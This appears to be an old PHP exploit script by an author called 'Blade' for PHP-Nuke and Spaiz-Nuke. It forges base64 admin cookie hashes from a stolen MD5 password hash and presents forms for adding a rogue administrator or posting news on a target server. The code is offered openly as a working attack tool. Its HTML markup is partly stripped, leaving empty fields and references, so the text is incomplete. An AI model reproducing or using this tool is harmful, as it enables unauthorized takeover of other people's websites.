Hello, Here my Exploit for PHP-Nuke >= v6.5 & Spaiz-Nuke SQL > v1.2 SQL Injection Code in PHP: Grettings, Blade... |Blade «blade@abez.org»| ****www.abez.org Of AbeZ ***www.rzw.com.ar By XyborG **www.adictosnet.com.ar By LaKosa *www.fihezine.tsx.to Of FiH eZine */ echo' PHP-Nuke And Spaiz-Nuke Injection Exploit v2.2 By Blade '; if (($action == "goAdmin") and ($server) and ($add_name) and ($add_email) and ($add_aid) and ($add_pwd)){ $admin_name = chop($admin_name); $admin_hash = chop($admin_hash); $server = chop($server); $add_pwd = chop($add_pwd); $hash = $admin_name . ":" . $admin_hash . ":"; $hash = base64_encode($hash); echo "
Servidor vulnerable : http://" . $server . " .
Clave Hash : " . $hash . " .
Nuevo Administrador : " . $add_name . ". En caso de que estos datos no sean correctos vuelva atras desde «Aquí».


Si son correctos continue la operacion agregando el nuevo Administrador.
"; } elseif (($action == "goNews") and ($server) and ($subject) and ($hometext) and ($bodytext)){ $admin_name = chop($admin_name); $admin_hash = chop($admin_hash); $server = chop($server); $add_pwd = chop($add_pwd); $hash = $admin_name . ":" . $admin_hash . ":"; $hash = base64_encode($hash); echo "
Servidor vulnerable : http://" . $server . " .
Clave Hash : " . $hash . " .
Asunto de la Noticia: " . $subject . ".
La Noticia es: " . $hometext . ".
En caso de que estos datos no sean correctos vuelva atras desde «Aquí».


Si son correctos continue la operacion agregando la noticia.
"; } elseif($exploit == "news") { echo'
Server Vulnerable:
Server Adress:
http://
Admin Name:
 

Password MD5:
 


The News:
Title(Obligatory):
Text of the News(Obligatory):
Extended Text(Obligatory):
Active Commentaries for this News?   Yes  No
You want to program this history?   Yes    No

Day: Month: Year:
Hour: : : 00
[ View exploit of the Administrators ]
'; } else { echo'

Server Vulnerable:
Server Adress:
http://
Admin Name:
 

Password MD5:
 


Account Data:
Name: (Obligatory)
Nickname: (Obligatory)
E-Mail: (Obligatory)
URL:
Password: (Obligatory)
[ View exploit of News ]
'; } if (($action == "goAdmin") or ($action == "goNews")){ echo''; }if (($action != "goAdmin") and ($action != "goNews")){ echo'
Usage:
»Server Adress : It is the URL corresponding to the vulnerable Vestibule in PHP-Nuke. Example: www.phpnuke.org.
»Nombre Admin : It is the identity in value of name, of the administrator who password is known enciphered. Example : xMan.
»Password MD5 : He is password enciphered in MD5 of the administrator, whose name is known. Example: 1ea52f26e7e0ce08e462f87f5e35096c

References:
Discoverers Bug :
More Information :
More Information :
More Information :
'; } echo'

Original Exploit Code By Blade.
Version 2.2.

'; ?>